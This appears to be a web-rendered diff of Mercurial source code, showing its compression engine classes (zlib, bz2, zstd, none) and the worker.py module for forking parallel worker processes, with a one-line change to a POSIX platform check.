3563 def decompress(self, data):
3564 try:
3564 try:
3565 return zlib.decompress(data)
3565 return zlib.decompress(data)
3566 except zlib.error as e:
3566 except zlib.error as e:
3567 raise error.RevlogError(_('revlog decompress error: %s') %
3567 raise error.RevlogError(_('revlog decompress error: %s') %
3568 str(e))
3568 str(e))
3569
3569
3570 def revlogcompressor(self, opts=None):
3570 def revlogcompressor(self, opts=None):
3571 return self.zlibrevlogcompressor()
3571 return self.zlibrevlogcompressor()
3572
3572
3573 compengines.register(_zlibengine())
3573 compengines.register(_zlibengine())
3574
3574
3575 class _bz2engine(compressionengine):
3575 class _bz2engine(compressionengine):
3576 def name(self):
3576 def name(self):
3577 return 'bz2'
3577 return 'bz2'
3578
3578
3579 def bundletype(self):
3579 def bundletype(self):
3580 """An algorithm that produces smaller bundles than ``gzip``.
3580 """An algorithm that produces smaller bundles than ``gzip``.
3581
3581
3582 All Mercurial clients should support this format.
3582 All Mercurial clients should support this format.
3583
3583
3584 This engine will likely produce smaller bundles than ``gzip`` but
3584 This engine will likely produce smaller bundles than ``gzip`` but
3585 will be significantly slower, both during compression and
3585 will be significantly slower, both during compression and
3586 decompression.
3586 decompression.
3587
3587
3588 If available, the ``zstd`` engine can yield similar or better
3588 If available, the ``zstd`` engine can yield similar or better
3589 compression at much higher speeds.
3589 compression at much higher speeds.
3590 """
3590 """
3591 return 'bzip2', 'BZ'
3591 return 'bzip2', 'BZ'
3592
3592
3593 # We declare a protocol name but don't advertise by default because
3593 # We declare a protocol name but don't advertise by default because
3594 # it is slow.
3594 # it is slow.
3595 def wireprotosupport(self):
3595 def wireprotosupport(self):
3596 return compewireprotosupport('bzip2', 0, 0)
3596 return compewireprotosupport('bzip2', 0, 0)
3597
3597
3598 def compressstream(self, it, opts=None):
3598 def compressstream(self, it, opts=None):
3599 opts = opts or {}
3599 opts = opts or {}
3600 z = bz2.BZ2Compressor(opts.get('level', 9))
3600 z = bz2.BZ2Compressor(opts.get('level', 9))
3601 for chunk in it:
3601 for chunk in it:
3602 data = z.compress(chunk)
3602 data = z.compress(chunk)
3603 if data:
3603 if data:
3604 yield data
3604 yield data
3605
3605
3606 yield z.flush()
3606 yield z.flush()
3607
3607
3608 def decompressorreader(self, fh):
3608 def decompressorreader(self, fh):
3609 def gen():
3609 def gen():
3610 d = bz2.BZ2Decompressor()
3610 d = bz2.BZ2Decompressor()
3611 for chunk in filechunkiter(fh):
3611 for chunk in filechunkiter(fh):
3612 yield d.decompress(chunk)
3612 yield d.decompress(chunk)
3613
3613
3614 return chunkbuffer(gen())
3614 return chunkbuffer(gen())
3615
3615
3616 compengines.register(_bz2engine())
3616 compengines.register(_bz2engine())
3617
3617
3618 class _truncatedbz2engine(compressionengine):
3618 class _truncatedbz2engine(compressionengine):
3619 def name(self):
3619 def name(self):
3620 return 'bz2truncated'
3620 return 'bz2truncated'
3621
3621
3622 def bundletype(self):
3622 def bundletype(self):
3623 return None, '_truncatedBZ'
3623 return None, '_truncatedBZ'
3624
3624
3625 # We don't implement compressstream because it is hackily handled elsewhere.
3625 # We don't implement compressstream because it is hackily handled elsewhere.
3626
3626
3627 def decompressorreader(self, fh):
3627 def decompressorreader(self, fh):
3628 def gen():
3628 def gen():
3629 # The input stream doesn't have the 'BZ' header. So add it back.
3629 # The input stream doesn't have the 'BZ' header. So add it back.
3630 d = bz2.BZ2Decompressor()
3630 d = bz2.BZ2Decompressor()
3631 d.decompress('BZ')
3631 d.decompress('BZ')
3632 for chunk in filechunkiter(fh):
3632 for chunk in filechunkiter(fh):
3633 yield d.decompress(chunk)
3633 yield d.decompress(chunk)
3634
3634
3635 return chunkbuffer(gen())
3635 return chunkbuffer(gen())
3636
3636
3637 compengines.register(_truncatedbz2engine())
3637 compengines.register(_truncatedbz2engine())
3638
3638
3639 class _noopengine(compressionengine):
3639 class _noopengine(compressionengine):
3640 def name(self):
3640 def name(self):
3641 return 'none'
3641 return 'none'
3642
3642
3643 def bundletype(self):
3643 def bundletype(self):
3644 """No compression is performed.
3644 """No compression is performed.
3645
3645
3646 Use this compression engine to explicitly disable compression.
3646 Use this compression engine to explicitly disable compression.
3647 """
3647 """
3648 return 'none', 'UN'
3648 return 'none', 'UN'
3649
3649
3650 # Clients always support uncompressed payloads. Servers don't because
3650 # Clients always support uncompressed payloads. Servers don't because
3651 # unless you are on a fast network, uncompressed payloads can easily
3651 # unless you are on a fast network, uncompressed payloads can easily
3652 # saturate your network pipe.
3652 # saturate your network pipe.
3653 def wireprotosupport(self):
3653 def wireprotosupport(self):
3654 return compewireprotosupport('none', 0, 10)
3654 return compewireprotosupport('none', 0, 10)
3655
3655
3656 # We don't implement revlogheader because it is handled specially
3656 # We don't implement revlogheader because it is handled specially
3657 # in the revlog class.
3657 # in the revlog class.
3658
3658
3659 def compressstream(self, it, opts=None):
3659 def compressstream(self, it, opts=None):
3660 return it
3660 return it
3661
3661
3662 def decompressorreader(self, fh):
3662 def decompressorreader(self, fh):
3663 return fh
3663 return fh
3664
3664
3665 class nooprevlogcompressor(object):
3665 class nooprevlogcompressor(object):
3666 def compress(self, data):
3666 def compress(self, data):
3667 return None
3667 return None
3668
3668
3669 def revlogcompressor(self, opts=None):
3669 def revlogcompressor(self, opts=None):
3670 return self.nooprevlogcompressor()
3670 return self.nooprevlogcompressor()
3671
3671
3672 compengines.register(_noopengine())
3672 compengines.register(_noopengine())
3673
3673
3674 class _zstdengine(compressionengine):
3674 class _zstdengine(compressionengine):
3675 def name(self):
3675 def name(self):
3676 return 'zstd'
3676 return 'zstd'
3677
3677
3678 @propertycache
3678 @propertycache
3679 def _module(self):
3679 def _module(self):
3680 # Not all installs have the zstd module available. So defer importing
3680 # Not all installs have the zstd module available. So defer importing
3681 # until first access.
3681 # until first access.
3682 try:
3682 try:
3683 from . import zstd
3683 from . import zstd
3684 # Force delayed import.
3684 # Force delayed import.
3685 zstd.__version__
3685 zstd.__version__
3686 return zstd
3686 return zstd
3687 except ImportError:
3687 except ImportError:
3688 return None
3688 return None
3689
3689
3690 def available(self):
3690 def available(self):
3691 return bool(self._module)
3691 return bool(self._module)
3692
3692
3693 def bundletype(self):
3693 def bundletype(self):
3694 """A modern compression algorithm that is fast and highly flexible.
3694 """A modern compression algorithm that is fast and highly flexible.
3695
3695
3696 Only supported by Mercurial 4.1 and newer clients.
3696 Only supported by Mercurial 4.1 and newer clients.
3697
3697
3698 With the default settings, zstd compression is both faster and yields
3698 With the default settings, zstd compression is both faster and yields
3699 better compression than ``gzip``. It also frequently yields better
3699 better compression than ``gzip``. It also frequently yields better
3700 compression than ``bzip2`` while operating at much higher speeds.
3700 compression than ``bzip2`` while operating at much higher speeds.
3701
3701
3702 If this engine is available and backwards compatibility is not a
3702 If this engine is available and backwards compatibility is not a
3703 concern, it is likely the best available engine.
3703 concern, it is likely the best available engine.
3704 """
3704 """
3705 return 'zstd', 'ZS'
3705 return 'zstd', 'ZS'
3706
3706
3707 def wireprotosupport(self):
3707 def wireprotosupport(self):
3708 return compewireprotosupport('zstd', 50, 50)
3708 return compewireprotosupport('zstd', 50, 50)
3709
3709
3710 def revlogheader(self):
3710 def revlogheader(self):
3711 return '\x28'
3711 return '\x28'
3712
3712
3713 def compressstream(self, it, opts=None):
3713 def compressstream(self, it, opts=None):
3714 opts = opts or {}
3714 opts = opts or {}
3715 # zstd level 3 is almost always significantly faster than zlib
3715 # zstd level 3 is almost always significantly faster than zlib
3716 # while providing no worse compression. It strikes a good balance
3716 # while providing no worse compression. It strikes a good balance
3717 # between speed and compression.
3717 # between speed and compression.
3718 level = opts.get('level', 3)
3718 level = opts.get('level', 3)
3719
3719
3720 zstd = self._module
3720 zstd = self._module
3721 z = zstd.ZstdCompressor(level=level).compressobj()
3721 z = zstd.ZstdCompressor(level=level).compressobj()
3722 for chunk in it:
3722 for chunk in it:
3723 data = z.compress(chunk)
3723 data = z.compress(chunk)
3724 if data:
3724 if data:
3725 yield data
3725 yield data
3726
3726
3727 yield z.flush()
3727 yield z.flush()
3728
3728
3729 def decompressorreader(self, fh):
3729 def decompressorreader(self, fh):
3730 zstd = self._module
3730 zstd = self._module
3731 dctx = zstd.ZstdDecompressor()
3731 dctx = zstd.ZstdDecompressor()
3732 return chunkbuffer(dctx.read_from(fh))
3732 return chunkbuffer(dctx.read_from(fh))
3733
3733
3734 class zstdrevlogcompressor(object):
3734 class zstdrevlogcompressor(object):
3735 def __init__(self, zstd, level=3):
3735 def __init__(self, zstd, level=3):
3736 # Writing the content size adds a few bytes to the output. However,
3736 # Writing the content size adds a few bytes to the output. However,
3737 # it allows decompression to be more optimal since we can
3737 # it allows decompression to be more optimal since we can
3738 # pre-allocate a buffer to hold the result.
3738 # pre-allocate a buffer to hold the result.
3739 self._cctx = zstd.ZstdCompressor(level=level,
3739 self._cctx = zstd.ZstdCompressor(level=level,
3740 write_content_size=True)
3740 write_content_size=True)
3741 self._dctx = zstd.ZstdDecompressor()
3741 self._dctx = zstd.ZstdDecompressor()
3742 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3742 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3743 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3743 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3744
3744
3745 def compress(self, data):
3745 def compress(self, data):
3746 insize = len(data)
3746 insize = len(data)
3747 # Caller handles empty input case.
3747 # Caller handles empty input case.
3748 assert insize > 0
3748 assert insize > 0
3749
3749
3750 if insize < 50:
3750 if insize < 50:
3751 return None
3751 return None
3752
3752
3753 elif insize <= 1000000:
3753 elif insize <= 1000000:
3754 compressed = self._cctx.compress(data)
3754 compressed = self._cctx.compress(data)
3755 if len(compressed) < insize:
3755 if len(compressed) < insize:
3756 return compressed
3756 return compressed
3757 return None
3757 return None
3758 else:
3758 else:
3759 z = self._cctx.compressobj()
3759 z = self._cctx.compressobj()
3760 chunks = []
3760 chunks = []
3761 pos = 0
3761 pos = 0
3762 while pos < insize:
3762 while pos < insize:
3763 pos2 = pos + self._compinsize
3763 pos2 = pos + self._compinsize
3764 chunk = z.compress(data[pos:pos2])
3764 chunk = z.compress(data[pos:pos2])
3765 if chunk:
3765 if chunk:
3766 chunks.append(chunk)
3766 chunks.append(chunk)
3767 pos = pos2
3767 pos = pos2
3768 chunks.append(z.flush())
3768 chunks.append(z.flush())
3769
3769
3770 if sum(map(len, chunks)) < insize:
3770 if sum(map(len, chunks)) < insize:
3771 return ''.join(chunks)
3771 return ''.join(chunks)
3772 return None
3772 return None
3773
3773
3774 def decompress(self, data):
3774 def decompress(self, data):
3775 insize = len(data)
3775 insize = len(data)
3776
3776
3777 try:
3777 try:
3778 # This was measured to be faster than other streaming
3778 # This was measured to be faster than other streaming
3779 # decompressors.
3779 # decompressors.
3780 dobj = self._dctx.decompressobj()
3780 dobj = self._dctx.decompressobj()
3781 chunks = []
3781 chunks = []
3782 pos = 0
3782 pos = 0
3783 while pos < insize:
3783 while pos < insize:
3784 pos2 = pos + self._decompinsize
3784 pos2 = pos + self._decompinsize
3785 chunk = dobj.decompress(data[pos:pos2])
3785 chunk = dobj.decompress(data[pos:pos2])
3786 if chunk:
3786 if chunk:
3787 chunks.append(chunk)
3787 chunks.append(chunk)
3788 pos = pos2
3788 pos = pos2
3789 # Frame should be exhausted, so no finish() API.
3789 # Frame should be exhausted, so no finish() API.
3790
3790
3791 return ''.join(chunks)
3791 return ''.join(chunks)
3792 except Exception as e:
3792 except Exception as e:
3793 raise error.RevlogError(_('revlog decompress error: %s') %
3793 raise error.RevlogError(_('revlog decompress error: %s') %
3794 str(e))
3794 str(e))
3795
3795
3796 def revlogcompressor(self, opts=None):
3796 def revlogcompressor(self, opts=None):
3797 opts = opts or {}
3797 opts = opts or {}
3798 return self.zstdrevlogcompressor(self._module,
3798 return self.zstdrevlogcompressor(self._module,
3799 level=opts.get('level', 3))
3799 level=opts.get('level', 3))
3800
3800
3801 compengines.register(_zstdengine())
3801 compengines.register(_zstdengine())
3802
3802
3803 def bundlecompressiontopics():
3803 def bundlecompressiontopics():
3804 """Obtains a list of available bundle compressions for use in help."""
3804 """Obtains a list of available bundle compressions for use in help."""
3805 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3805 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3806 items = {}
3806 items = {}
3807
3807
3808 # We need to format the docstring. So use a dummy object/type to hold it
3808 # We need to format the docstring. So use a dummy object/type to hold it
3809 # rather than mutating the original.
3809 # rather than mutating the original.
3810 class docobject(object):
3810 class docobject(object):
3811 pass
3811 pass
3812
3812
3813 for name in compengines:
3813 for name in compengines:
3814 engine = compengines[name]
3814 engine = compengines[name]
3815
3815
3816 if not engine.available():
3816 if not engine.available():
3817 continue
3817 continue
3818
3818
3819 bt = engine.bundletype()
3819 bt = engine.bundletype()
3820 if not bt or not bt[0]:
3820 if not bt or not bt[0]:
3821 continue
3821 continue
3822
3822
3823 doc = pycompat.sysstr('``%s``\n %s') % (
3823 doc = pycompat.sysstr('``%s``\n %s') % (
3824 bt[0], engine.bundletype.__doc__)
3824 bt[0], engine.bundletype.__doc__)
3825
3825
3826 value = docobject()
3826 value = docobject()
3827 value.__doc__ = doc
3827 value.__doc__ = doc
3828 value._origdoc = engine.bundletype.__doc__
3828 value._origdoc = engine.bundletype.__doc__
3829 value._origfunc = engine.bundletype
3829 value._origfunc = engine.bundletype
3830
3830
3831 items[bt[0]] = value
3831 items[bt[0]] = value
3832
3832
3833 return items
3833 return items
3834
3834
3835 i18nfunctions = bundlecompressiontopics().values()
3835 i18nfunctions = bundlecompressiontopics().values()
3836
3836
3837 # convenient shortcut
3837 # convenient shortcut
3838 dst = debugstacktrace
3838 dst = debugstacktrace
3839
3839
3840 def safename(f, tag, ctx, others=None):
3840 def safename(f, tag, ctx, others=None):
3841 """
3841 """
3842 Generate a name that it is safe to rename f to in the given context.
3842 Generate a name that it is safe to rename f to in the given context.
3843
3843
3844 f: filename to rename
3844 f: filename to rename
3845 tag: a string tag that will be included in the new name
3845 tag: a string tag that will be included in the new name
3846 ctx: a context, in which the new name must not exist
3846 ctx: a context, in which the new name must not exist
3847 others: a set of other filenames that the new name must not be in
3847 others: a set of other filenames that the new name must not be in
3848
3848
3849 Returns a file name of the form oldname~tag[~number] which does not exist
3849 Returns a file name of the form oldname~tag[~number] which does not exist
3850 in the provided context and is not in the set of other names.
3850 in the provided context and is not in the set of other names.
3851 """
3851 """
3852 if others is None:
3852 if others is None:
3853 others = set()
3853 others = set()
3854
3854
3855 fn = '%s~%s' % (f, tag)
3855 fn = '%s~%s' % (f, tag)
3856 if fn not in ctx and fn not in others:
3856 if fn not in ctx and fn not in others:
3857 return fn
3857 return fn
3858 for n in itertools.count(1):
3858 for n in itertools.count(1):
3859 fn = '%s~%s~%s' % (f, tag, n)
3859 fn = '%s~%s~%s' % (f, tag, n)
3860 if fn not in ctx and fn not in others:
3860 if fn not in ctx and fn not in others:
3861 return fn
3861 return fn
@@ -1,240 +1,240 b''
1 # worker.py - master-slave parallelism support
1 # worker.py - master-slave parallelism support
2 #
2 #
3 # Copyright 2013 Facebook, Inc.
3 # Copyright 2013 Facebook, Inc.
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import errno
10 import errno
11 import os
11 import os
12 import signal
12 import signal
13 import sys
13 import sys
14
14
15 from .i18n import _
15 from .i18n import _
16 from . import (
16 from . import (
17 encoding,
17 encoding,
18 error,
18 error,
19 pycompat,
19 pycompat,
20 scmutil,
20 scmutil,
21 util,
21 util,
22 )
22 )
23
23
24 def countcpus():
24 def countcpus():
25 '''try to count the number of CPUs on the system'''
25 '''try to count the number of CPUs on the system'''
26
26
27 # posix
27 # posix
28 try:
28 try:
29 n = int(os.sysconf(r'SC_NPROCESSORS_ONLN'))
29 n = int(os.sysconf(r'SC_NPROCESSORS_ONLN'))
30 if n > 0:
30 if n > 0:
31 return n
31 return n
32 except (AttributeError, ValueError):
32 except (AttributeError, ValueError):
33 pass
33 pass
34
34
35 # windows
35 # windows
36 try:
36 try:
37 n = int(encoding.environ['NUMBER_OF_PROCESSORS'])
37 n = int(encoding.environ['NUMBER_OF_PROCESSORS'])
38 if n > 0:
38 if n > 0:
39 return n
39 return n
40 except (KeyError, ValueError):
40 except (KeyError, ValueError):
41 pass
41 pass
42
42
43 return 1
43 return 1
44
44
45 def _numworkers(ui):
45 def _numworkers(ui):
46 s = ui.config('worker', 'numcpus')
46 s = ui.config('worker', 'numcpus')
47 if s:
47 if s:
48 try:
48 try:
49 n = int(s)
49 n = int(s)
50 if n >= 1:
50 if n >= 1:
51 return n
51 return n
52 except ValueError:
52 except ValueError:
53 raise error.Abort(_('number of cpus must be an integer'))
53 raise error.Abort(_('number of cpus must be an integer'))
54 return min(max(countcpus(), 4), 32)
54 return min(max(countcpus(), 4), 32)
55
55
56 if pycompat.osname == 'posix':
56 if pycompat.isposix:
57 _startupcost = 0.01
57 _startupcost = 0.01
58 else:
58 else:
59 _startupcost = 1e30
59 _startupcost = 1e30
60
60
61 def worthwhile(ui, costperop, nops):
61 def worthwhile(ui, costperop, nops):
62 '''try to determine whether the benefit of multiple processes can
62 '''try to determine whether the benefit of multiple processes can
63 outweigh the cost of starting them'''
63 outweigh the cost of starting them'''
64 linear = costperop * nops
64 linear = costperop * nops
65 workers = _numworkers(ui)
65 workers = _numworkers(ui)
66 benefit = linear - (_startupcost * workers + linear / workers)
66 benefit = linear - (_startupcost * workers + linear / workers)
67 return benefit >= 0.15
67 return benefit >= 0.15
68
68
69 def worker(ui, costperarg, func, staticargs, args):
69 def worker(ui, costperarg, func, staticargs, args):
70 '''run a function, possibly in parallel in multiple worker
70 '''run a function, possibly in parallel in multiple worker
71 processes.
71 processes.
72
72
73 returns a progress iterator
73 returns a progress iterator
74
74
75 costperarg - cost of a single task
75 costperarg - cost of a single task
76
76
77 func - function to run
77 func - function to run
78
78
79 staticargs - arguments to pass to every invocation of the function
79 staticargs - arguments to pass to every invocation of the function
80
80
81 args - arguments to split into chunks, to pass to individual
81 args - arguments to split into chunks, to pass to individual
82 workers
82 workers
83 '''
83 '''
84 if worthwhile(ui, costperarg, len(args)):
84 if worthwhile(ui, costperarg, len(args)):
85 return _platformworker(ui, func, staticargs, args)
85 return _platformworker(ui, func, staticargs, args)
86 return func(*staticargs + (args,))
86 return func(*staticargs + (args,))
87
87
88 def _posixworker(ui, func, staticargs, args):
88 def _posixworker(ui, func, staticargs, args):
89 rfd, wfd = os.pipe()
89 rfd, wfd = os.pipe()
90 workers = _numworkers(ui)
90 workers = _numworkers(ui)
91 oldhandler = signal.getsignal(signal.SIGINT)
91 oldhandler = signal.getsignal(signal.SIGINT)
92 signal.signal(signal.SIGINT, signal.SIG_IGN)
92 signal.signal(signal.SIGINT, signal.SIG_IGN)
93 pids, problem = set(), [0]
93 pids, problem = set(), [0]
94 def killworkers():
94 def killworkers():
95 # unregister SIGCHLD handler as all children will be killed. This
95 # unregister SIGCHLD handler as all children will be killed. This
96 # function shouldn't be interrupted by another SIGCHLD; otherwise pids
96 # function shouldn't be interrupted by another SIGCHLD; otherwise pids
97 # could be updated while iterating, which would cause inconsistency.
97 # could be updated while iterating, which would cause inconsistency.
98 signal.signal(signal.SIGCHLD, oldchldhandler)
98 signal.signal(signal.SIGCHLD, oldchldhandler)
99 # if one worker bails, there's no good reason to wait for the rest
99 # if one worker bails, there's no good reason to wait for the rest
100 for p in pids:
100 for p in pids:
101 try:
101 try:
102 os.kill(p, signal.SIGTERM)
102 os.kill(p, signal.SIGTERM)
103 except OSError as err:
103 except OSError as err:
104 if err.errno != errno.ESRCH:
104 if err.errno != errno.ESRCH:
105 raise
105 raise
106 def waitforworkers(blocking=True):
106 def waitforworkers(blocking=True):
107 for pid in pids.copy():
107 for pid in pids.copy():
108 p = st = 0
108 p = st = 0
109 while True:
109 while True:
110 try:
110 try:
111 p, st = os.waitpid(pid, (0 if blocking else os.WNOHANG))
111 p, st = os.waitpid(pid, (0 if blocking else os.WNOHANG))
112 break
112 break
113 except OSError as e:
113 except OSError as e:
114 if e.errno == errno.EINTR:
114 if e.errno == errno.EINTR:
115 continue
115 continue
116 elif e.errno == errno.ECHILD:
116 elif e.errno == errno.ECHILD:
117 # child would already be reaped, but pids yet been
117 # child would already be reaped, but pids yet been
118 # updated (maybe interrupted just after waitpid)
118 # updated (maybe interrupted just after waitpid)
119 pids.discard(pid)
119 pids.discard(pid)
120 break
120 break
121 else:
121 else:
122 raise
122 raise
123 if not p:
123 if not p:
124 # skip subsequent steps, because child process should
124 # skip subsequent steps, because child process should
125 # be still running in this case
125 # be still running in this case
126 continue
126 continue
127 pids.discard(p)
127 pids.discard(p)
128 st = _exitstatus(st)
128 st = _exitstatus(st)
129 if st and not problem[0]:
129 if st and not problem[0]:
130 problem[0] = st
130 problem[0] = st
131 def sigchldhandler(signum, frame):
131 def sigchldhandler(signum, frame):
132 waitforworkers(blocking=False)
132 waitforworkers(blocking=False)
133 if problem[0]:
133 if problem[0]:
134 killworkers()
134 killworkers()
135 oldchldhandler = signal.signal(signal.SIGCHLD, sigchldhandler)
135 oldchldhandler = signal.signal(signal.SIGCHLD, sigchldhandler)
136 ui.flush()
136 ui.flush()
137 parentpid = os.getpid()
137 parentpid = os.getpid()
138 for pargs in partition(args, workers):
138 for pargs in partition(args, workers):
139 # make sure we use os._exit in all worker code paths. otherwise the
139 # make sure we use os._exit in all worker code paths. otherwise the
140 # worker may do some clean-ups which could cause surprises like
140 # worker may do some clean-ups which could cause surprises like
141 # deadlock. see sshpeer.cleanup for example.
141 # deadlock. see sshpeer.cleanup for example.
142 # override error handling *before* fork. this is necessary because
142 # override error handling *before* fork. this is necessary because
143 # exception (signal) may arrive after fork, before "pid =" assignment
143 # exception (signal) may arrive after fork, before "pid =" assignment
144 # completes, and other exception handler (dispatch.py) can lead to
144 # completes, and other exception handler (dispatch.py) can lead to
145 # unexpected code path without os._exit.
145 # unexpected code path without os._exit.
146 ret = -1
146 ret = -1
147 try:
147 try:
148 pid = os.fork()
148 pid = os.fork()
149 if pid == 0:
149 if pid == 0:
150 signal.signal(signal.SIGINT, oldhandler)
150 signal.signal(signal.SIGINT, oldhandler)
151 signal.signal(signal.SIGCHLD, oldchldhandler)
151 signal.signal(signal.SIGCHLD, oldchldhandler)
152
152
153 def workerfunc():
153 def workerfunc():
154 os.close(rfd)
154 os.close(rfd)
155 for i, item in func(*(staticargs + (pargs,))):
155 for i, item in func(*(staticargs + (pargs,))):
156 os.write(wfd, '%d %s\n' % (i, item))
156 os.write(wfd, '%d %s\n' % (i, item))
157 return 0
157 return 0
158
158
159 ret = scmutil.callcatch(ui, workerfunc)
159 ret = scmutil.callcatch(ui, workerfunc)
160 except: # parent re-raises, child never returns
160 except: # parent re-raises, child never returns
161 if os.getpid() == parentpid:
161 if os.getpid() == parentpid:
162 raise
162 raise
163 exctype = sys.exc_info()[0]
163 exctype = sys.exc_info()[0]
164 force = not issubclass(exctype, KeyboardInterrupt)
164 force = not issubclass(exctype, KeyboardInterrupt)
165 ui.traceback(force=force)
165 ui.traceback(force=force)
166 finally:
166 finally:
167 if os.getpid() != parentpid:
167 if os.getpid() != parentpid:
168 try:
168 try:
169 ui.flush()
169 ui.flush()
170 except: # never returns, no re-raises
170 except: # never returns, no re-raises
171 pass
171 pass
172 finally:
172 finally:
173 os._exit(ret & 255)
173 os._exit(ret & 255)
174 pids.add(pid)
174 pids.add(pid)
175 os.close(wfd)
175 os.close(wfd)
176 fp = os.fdopen(rfd, pycompat.sysstr('rb'), 0)
176 fp = os.fdopen(rfd, pycompat.sysstr('rb'), 0)
177 def cleanup():
177 def cleanup():
178 signal.signal(signal.SIGINT, oldhandler)
178 signal.signal(signal.SIGINT, oldhandler)
179 waitforworkers()
179 waitforworkers()
180 signal.signal(signal.SIGCHLD, oldchldhandler)
180 signal.signal(signal.SIGCHLD, oldchldhandler)
181 status = problem[0]
181 status = problem[0]
182 if status:
182 if status:
183 if status < 0:
183 if status < 0:
184 os.kill(os.getpid(), -status)
184 os.kill(os.getpid(), -status)
185 sys.exit(status)
185 sys.exit(status)
186 try:
186 try:
187 for line in util.iterfile(fp):
187 for line in util.iterfile(fp):
188 l = line.split(' ', 1)
188 l = line.split(' ', 1)
189 yield int(l[0]), l[1][:-1]
189 yield int(l[0]), l[1][:-1]
190 except: # re-raises
190 except: # re-raises
191 killworkers()
191 killworkers()
192 cleanup()
192 cleanup()
193 raise
193 raise
194 cleanup()
194 cleanup()
195
195
196 def _posixexitstatus(code):
196 def _posixexitstatus(code):
197 '''convert a posix exit status into the same form returned by
197 '''convert a posix exit status into the same form returned by
198 os.spawnv
198 os.spawnv
199
199
200 returns None if the process was stopped instead of exiting'''
200 returns None if the process was stopped instead of exiting'''
201 if os.WIFEXITED(code):
201 if os.WIFEXITED(code):
202 return os.WEXITSTATUS(code)
202 return os.WEXITSTATUS(code)
203 elif os.WIFSIGNALED(code):
203 elif os.WIFSIGNALED(code):
204 return -os.WTERMSIG(code)
204 return -os.WTERMSIG(code)
205
205
206 if not pycompat.iswindows:
206 if not pycompat.iswindows:
207 _platformworker = _posixworker
207 _platformworker = _posixworker
208 _exitstatus = _posixexitstatus
208 _exitstatus = _posixexitstatus
209
209
210 def partition(lst, nslices):
210 def partition(lst, nslices):
211 '''partition a list into N slices of roughly equal size
211 '''partition a list into N slices of roughly equal size
212
212
213 The current strategy takes every Nth element from the input. If
213 The current strategy takes every Nth element from the input. If
214 we ever write workers that need to preserve grouping in input
214 we ever write workers that need to preserve grouping in input
215 we should consider allowing callers to specify a partition strategy.
215 we should consider allowing callers to specify a partition strategy.
216
216
217 mpm is not a fan of this partitioning strategy when files are involved.
217 mpm is not a fan of this partitioning strategy when files are involved.
218 In his words:
218 In his words:
219
219
220 Single-threaded Mercurial makes a point of creating and visiting
220 Single-threaded Mercurial makes a point of creating and visiting
221 files in a fixed order (alphabetical). When creating files in order,
221 files in a fixed order (alphabetical). When creating files in order,
222 a typical filesystem is likely to allocate them on nearby regions on
222 a typical filesystem is likely to allocate them on nearby regions on
223 disk. Thus, when revisiting in the same order, locality is maximized
223 disk. Thus, when revisiting in the same order, locality is maximized
224 and various forms of OS and disk-level caching and read-ahead get a
224 and various forms of OS and disk-level caching and read-ahead get a
225 chance to work.
225 chance to work.
226
226
227 This effect can be quite significant on spinning disks. I discovered it
227 This effect can be quite significant on spinning disks. I discovered it
228 circa Mercurial v0.4 when revlogs were named by hashes of filenames.
228 circa Mercurial v0.4 when revlogs were named by hashes of filenames.
229 Tarring a repo and copying it to another disk effectively randomized
229 Tarring a repo and copying it to another disk effectively randomized
230 the revlog ordering on disk by sorting the revlogs by hash and suddenly
230 the revlog ordering on disk by sorting the revlogs by hash and suddenly
231 performance of my kernel checkout benchmark dropped by ~10x because the
231 performance of my kernel checkout benchmark dropped by ~10x because the
232 "working set" of sectors visited no longer fit in the drive's cache and
232 "working set" of sectors visited no longer fit in the drive's cache and
233 the workload switched from streaming to random I/O.
233 the workload switched from streaming to random I/O.
234
234
235 What we should really be doing is have workers read filenames from a
235 What we should really be doing is have workers read filenames from a
236 ordered queue. This preserves locality and also keeps any worker from
236 ordered queue. This preserves locality and also keeps any worker from
237 getting more than one file out of balance.
237 getting more than one file out of balance.
238 '''
238 '''
239 for i in range(nslices):
239 for i in range(nslices):
240 yield lst[i::nslices]
240 yield lst[i::nslices]
General Comments 0
You need to be logged in to leave comments. Login now